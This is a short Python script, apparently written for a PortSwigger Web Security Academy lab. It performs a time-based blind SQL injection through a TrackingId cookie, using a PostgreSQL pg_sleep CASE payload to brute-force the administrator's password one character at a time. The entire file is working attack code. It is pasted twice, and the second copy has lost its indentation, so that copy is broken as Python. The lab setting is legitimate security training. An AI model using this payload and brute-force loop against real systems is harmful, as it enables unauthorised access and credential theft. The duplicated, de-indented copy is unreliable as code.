thewhiteh4t/blind_sql_brute.py

## blind_sql_brute.py
#!/usr/bin/env python3

import requests

url = 'https://ac8b1f4b1e6ce1ca80d12b3a001600d1.web-security-academy.net/'
max_len = 21
min_len = 1
timeout = 10

charset = 'abcdefghijklmnopqrstuvwxyz1234567890!@#$'
password = ''

s = requests.Session()

for i in range(min_len, max_len):
    print(f'[!] Brute forcing {i} character...')
    for char in charset:
        payload = f"'%3BSELECT+CASE+WHEN+(username='administrator')+AND+substring(password,{i},1)='{char}'+THEN+pg_sleep({timeout})+ELSE+pg_sleep(0)+END+FROM+users--"

        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0'
        }

        cookies = {
            'TrackingId': f'x{payload}',
            'session': 'SlLKMHaUhxEeIX0ujm22zMcRzquHgI68'
        }

        try:
            s.get(url, headers=headers, cookies=cookies, timeout=timeout - 1)
        except requests.exceptions.ReadTimeout:
            password += char
            print(f'[+] PASSWORD : {password}')
            break
	#!/usr/bin/env python3

	import requests

	url = 'https://ac8b1f4b1e6ce1ca80d12b3a001600d1.web-security-academy.net/'
	max_len = 21
	min_len = 1
	timeout = 10

	charset = 'abcdefghijklmnopqrstuvwxyz1234567890!@#$'
	password = ''

	s = requests.Session()

	for i in range(min_len, max_len):
	print(f'[!] Brute forcing {i} character...')
	for char in charset:
	payload = f"'%3BSELECT+CASE+WHEN+(username='administrator')+AND+substring(password,{i},1)='{char}'+THEN+pg_sleep({timeout})+ELSE+pg_sleep(0)+END+FROM+users--"

	headers = {
	'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0'
	}

	cookies = {
	'TrackingId': f'x{payload}',
	'session': 'SlLKMHaUhxEeIX0ujm22zMcRzquHgI68'
	}

	try:
	s.get(url, headers=headers, cookies=cookies, timeout=timeout - 1)
	except requests.exceptions.ReadTimeout:
	password += char
	print(f'[+] PASSWORD : {password}')
	break